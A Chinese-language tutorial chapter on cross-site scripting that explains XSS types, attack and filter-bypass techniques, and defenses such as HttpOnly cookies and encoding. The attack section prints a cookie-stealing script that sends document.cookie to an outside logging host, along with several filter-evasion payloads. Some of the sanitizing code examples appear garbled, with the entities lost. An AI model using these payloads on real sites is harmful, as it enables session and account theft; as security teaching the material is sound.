第3章 跨站脚本攻击（xss）

3.1 xss简介

恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意用户的特殊目的。

XSS攻击：跨站脚本攻击(Cross Site Scripting)，为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。

XSS本质就是HTML注入

XSS的分类：

（1）     反射型XSS: 一个恶意构造了Web的URL

（2）     存储型XSS:将用户输入的恶意数据保存在数据库中，此方式会持久性的影响。

（3）     DOMBased XSS:根据用户输入的数据形成XSS攻击，效果类似于反射型XSS.

这三种类型中危害最大的应该是存储型XSS，因为每一次打开页面都会执行。

DOM Based XSS目前在“东方红”项目的代码中应该存在大量的，可以关注。

XSS攻击的危害包括：

q  盗取各类用户帐号，如机器登录帐号、用户网银帐号、各类管理员帐号

q  控制企业数据，包括读取、篡改、添加、删除企业敏感数据的能力

q  盗窃企业重要的具有商业价值的资料

q  非法转账

q  强制发送电子邮件

q  网站挂马

q  控制受害者机器向其它网站发起攻击

3.2 xss攻击进阶

js获取URL参数：

function getArgs(){
    var args= {};
    varmatch = null;
    varsearch = decodeURIComponent(location.search.substring(1));
    var reg= /(?:([^&]+)=([^&]+))/g;
   while((match = reg.exec(search))!==null){
       args[match[1]] = match[2];
    }
    returnargs;
}

xss窃取cookie

在evil.js文件中写如下代码,存储在www.test.com根目录下：

var img=document.createElement("img");

img.src="http://www.myhack58.com/log?"+escape(document.cookie);

document.body.appendChild(img);

然后在测试页，想办法让别人运行这段代码

<scriptsrc="http://www.test.com/evil.js"></script>

然后在web日志中可查看窃取的cookie信息

构造get和post攻击

q  根据HTTP规范，GET用于信息获取，而且应该是安全的和幂等的；

q  根据HTTP规范，POST表示可能修改变服务器上的资源的请求。

所以可以从js或者使用java进行构造get和post攻击

GET和POST的区别：

1，GET请求的数据会附在URL之后（就是把数据放置在HTTP协议头中），以?分割URL和传输数据，参数之间以&相连；POST把提交的数据则放置在是HTTP包的包体中。

2，GET方式提交的数据最多只能是1024字节，理论上POST没有限制，可传较大量的数据。

3，POST的安全性要比GET的安全性高。

获取用户信息

查看当前页面的cookie：javascript:alert(document.cookie)

查看浏览器的版本：javascript:alert(navigator.userAgent)

chrome浏览器：

chrome://appcache-internals HTML5应用程序缓存的诊断

chrome://blob-internals

chrome://bookmarks 书签 快捷键是ctrl+shift+o

chrome://cache 缓存记录

chrome://chrome-urls

chrome://crashes 当机记录

chrome://credits 好像是鸣谢

chrome://dns 预取DNS记录

chrome://downloads 下载页 快捷键是Ctrl + J

chrome://extensions 扩展页

chrome://flags 实验室(危险)

chrome://flash 关於插件flash

chrome://gpu-internals gpu加速相关

chrome://history 历史页 快捷键是Ctrl + H

chrome://ipc 这个网页无法使用 chrome://ipc/ 的网页可能暂时无法使用或被永久移至新网址。=_=

chrome://inspect 检查

chrome://media-internals 不知道

chrome://memory 显示Chrome使用的内存 浏览器的PID 进程名称

chrome://nacl 关于插件Native Client

chrome://net-internals 显示所有与网络有关的信息例如Tests中能告诉你url加载失败的原因 又能强制Chrome浏览器Https加密访问网站http://www.chinagfw.org/2011/09/chromehttps.html

chrome://view-http-cache 也是缓存

chrome://newtab 新分页

chrome://omnibox 和地址栏的即时搜寻引擎一样

chrome://plugins 插件页

chrome://policy 政策 有兴趣的可以看看http://www.chromium.org/administrators/policy-list-3 我也不太懂

chrome://predictors 地址栏搜寻历史

chrome://profiler 不知道

chrome://quota-internals 可用的硬盘空间和配置文件目录

chrome://settings 设定页

chrome://stats 不知为什麼空白了

chrome://sync-internals Chrome同步细节

chrome://terms Chrome服务条款

chrome://tracing 开发工具 对Chrome的性能进行分析

chrome://version 版本

chrome://conflicts 这个页面列出了所有已载入主要程序中的模组(dll)

chrome://print 列印页

For Debug 以下是各种崩溃

chrome://crash

chrome://kill

chrome://hang

chrome://shorthang

chrome://gpuclean

chrome://gpucrash

chrome://gpuhang

firefox浏览器：

about:blank －和大多数浏览器一样，显示一个空白页面

about:blocked －显示“该网站被攻击”、“已经被报告的攻击站点”页面

about:buildconfig － 显示当前火狐的编译器和编译参数信息(不同的发行版，编译参数不尽相同，可以用这种方式进行查看)

about:credits － 所有项目贡献者

about:certerror － 显示证书失效/错误页面

about:cache － 显示缓存文件(分为 内存缓存/硬盘缓存/离线缓存 三部分)

about:config － 修改火狐的配置选项(个人认为是火狐最优秀的地方，详细说明)

about:feeds － 显示火狐feed页面

about:home － 显示火狐默认的home页面

about:license － Mozilla 和 Netscape 的公共授权许可协议(等同于 about:licence)

about:logo － 显示firefox的logo

about:mozilla － 彩蛋，显示著名的《Mozilla之书》

about:neterror － 显示网络错误页面(包括reset，connection timeout等)

about:plugins － 列出所有已安装的插件信息(是插件，而非扩展，是flash/totem-player插件，而非adblock扩展)

about:privatebrowsing －切换浏览器的隐私浏览模式(此时的地址栏不会有任何显示)

about:memory － 查看浏览器的内存占用信息(我这里显示No other informationavailable……)

about:rights － 读完了license，就要知道自己的rights了 :)

about:robots － 彩蛋而已，不必大惊小怪。

about:sessionrestore －重建最后一次会话标签

about:support －Firefox技术支持、疑难排解页面(显示浏览器基本信息；所有扩展信息——adblock是扩展，而flash是插件；人为修改过的about：config选项——这个很重要，可以依据这个回溯操作)

可以通过标签的style属性构造出XSS.

<div style"backgroup:url(‘javascript:alert(1)‘)">

xss构造技巧

q  利用字符编码---使用UTF-8；

q  绕过长度限制---使用eval函数；

q  使用<base>标签---该标签作用是定义页面上的所有使用“相对路径”标签hosting地址；

q  window.name---绕过长度限制；

网络上的总结：

1、拆开value。。

校内里有这样无数个xss..

举个例子最简单……

比如：

<form action="post"name="bloodsword" value="">

xxxx

</form>

我以get举例。如果他支持get的话，很简单...

http://xiaonei.com/f**k.do?bloodsword=bink"onload=alert(/xss/);

这样。到源代码里查看，结果就变成：

<a href="http://xiaonei.com/back.do"value="bink" onload=alert(/xss/)>

这个使用在get……大部分的站，只要你自己仔细去看name。一些Hidden元素，都能找到。这个是因为没过滤掉引号惹的。

2、字符集xss inject

这个方法看服务器的吧……我也不大确定…

还有些受浏览器的限制。

比如FF

http://xiaonei.com/do.do?bink=aaa%afalert("xss")

3、针对不同浏览器构造特殊点的标签。

继续举例子。比如IE6内核的，

<imgsrc="javascript:alert(document.cookie)">

这个在IE 7以上就没了。-。- 这个IE是不是向下兼容的啊……

还有FF的video标签。

IE8开始支持一些怪里怪气的，比如锚的title标签里的javascript了。

4、自己构造绕过的。

方法其实可以参考富文本的绕过方式。

有些程序员知道要防xss，但是不知道还能绕过

知道要防止以o开头的事件，这样本以为onload onmouseover都会再见的。

但是oolooad

ooclick。。。就OK了。。

很简单，要复杂的就去看富文本

5、16进制

有些地方程序员过滤了很很很很多，几乎没辙的时候，不防试试 16进制，16进制主要是那个&#这个怕被过滤。。

6、src属性。

这个属性几乎很常用，有些站知道在那防御xss，以为只要以jpg结尾就没事了。。。

比如yahoo.。。。一个profile里的入库xss。。满足xxx.jpg就成。。

7、cookie xss

这个是……什么什么DOM 什么cookie直接输出造成的。 貌似是直接读取cookie里的xxxxxx形成的。

FF可以改cookie。直接写script就能出现cookie xss了。。。Google出现过一次。

8、DOM xss

和cookie原理类似吧。

3.3 xss的防御

3.3.1 四两拨千斤：httponly

在cookie中设置了HttpOnly属性，那么通过js脚本将无法读取到cookie信息，这样能有效的防止XSS攻击。

response.setHeader("Set-Cookie","cookiename=value;
Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");

参考：https://www.owasp.org/index.php/HTTPOnly

http://www.oschina.net/question/100267_65116

3.3.2 输入检查

对于输入检测，这是一个很有趣的现象：前端检查是防君子不防小人。后台检测是都防。所以前端后端都需要写上。

在不同的编码后（经过编码函数处理后的数据，如HtmlEncode，javascriptEncode，XMLEncode，jsonEncode）的数据长度可能会发生改变，从而会影响某些功能。

3.3.3 输出检查

使用JavascriptEncode的变量输出一定要在引号内。

3.3.4 正确地防御xss

先找问题，再想出对策

XSS的本质是HTML注入,HTML注入的原因是将数据看做了代码.

参考地址：https://www.owasp.org/index.php/Main_Page

3.3.5 处理富文本

对于富文本的防御，我目前认为比较好的方法是“黑白名单”

3.3.6 防御dom based xss

在前端使用编码函数进行过滤

3.3.7 换个角度看xss的风险

网上总结：

1、过滤”<”和”>”标记XSS跨站攻击的最终目标是引入script代码在用户的浏览器中执行，所以最基本最简单的过滤方法，就是转换”<”和’>”标记。

replace(str, "<", "<")
replace(str, ">", ">")

2、HTML属性过滤

使用上述的代码可以过滤掉”<”和”>”标记，让攻击者无法构造HTML标记。但是，攻击者可能会利用已存在的属性，如插入图片功能，将图片的路径属性修改为一段script代码，如

<img src="javascript:alert(/XSS
攻击
/)" width=100>

上述代码执行后，同样可以实现跨站的目的。而且很多的HTML标记里属性都支持“javascript:跨站代码”的形式，因此就需要对攻击者输入的数据进行如下转换：

replace(str, "javascript:","")
replace(str, "jscript:", "")
replace(str, "vbscript:", "")

一旦用户输入的语句中含有”javascript”，”jscript”，”vbscript”，都用空白代替。

3、过滤特殊字符：&、回车和空格

因为HTML属性的值，可支持”&#ASCii”的形式进行表示，前面的跨站代码就可以换成这样：

<img src="javascript:alert(/XSS
攻击
/)" width=100>

即可突破过滤程序，继续进行跨站攻击，使用代码：

replace(str, "&", "&")

上述代码将”&”替换为了”&”，于是后面的语句就变形失效了。但是还有其他的方式绕过过滤，因为过滤关键字的方式具有很多的漏洞。攻击者可以构造下面的攻击代码：

<img src="javas cript:alert(/XSS
攻击
/)" width=100>

这里关键字被空格，准确的说是Tab键进行了拆分，上面的代码就又失效了，这样就有考虑将Tab空格过滤，防止此类的跨站攻击。

4、HTML属性跨站的彻底防范

即使程序设计者彻底过滤了各种危险字符，确实给攻击者进行跨站入侵带来了麻烦，攻击者依然可以利用程序的缺陷进行攻击，因为攻击者可以利用前面说的属性和事件机制，构造执行script代码。例如，有下面这样一个图片标记代码：

<img src="#" onerror=alert(/
跨站
/)>

这是一个利用onerror事件的典型跨站攻击示例，于是许多程序设计者对此事件进行了过滤，一旦发现关键字”onerror”，就进行转换过滤。

然而攻击者可以利用的时间跨站方法，并不只有onerror一种，各种各样的属性都可以进行构造跨站攻击。例如：

<img src="#" style="Xss:expression(alert(/
跨站
/));">

这样的事件属性，同样是可以实现跨站攻击的。可以注意到，在“src=”#””和“style”之间有一个空格，也就是说属性之间需要空格分隔，于是程序设计者可能对空格进行过滤，以防范此类的攻击。但是过滤了空格之后，同样可以被攻击者突破。

<img src="#"/**/onerror=alert(/
跨站
/) width=100>

这段代码利用了脚本语言的规则漏洞，在脚本语言中的注释会被当成一个空白来表示。所以注释代码就简介的达到了空格的效果，使语句得以执行。

3.4 小结

1.对于开发者，首先应该把精力放到对所有用户提交内容进行可靠的输入验证上。这些提交内容包括URL、查询关键字、http头、post数据等。只接受在你所规定长度范围内、采用适当格式、你所希望的字符。阻塞、过滤或者忽略其它的任何东西。

2.保护所有敏感的功能，以防被bots自动化或者被第三方网站所执行。实现session标记（session tokens）、CAPTCHA系统或者HTTP引用头检查。

3.如果你的web应用必须支持用户提供的HTML，那么应用的安全性将受到灾难性的下滑。但是你还是可以做一些事来保护web站点：确认你接收的HTML内容被妥善地格式化，仅包含最小化的、安全的tag（绝对没有JavaScript），去掉任何对远程内容的引用（尤其是样式表和JavaScript）。为了更多的安全，请使用httpOnly的cookie。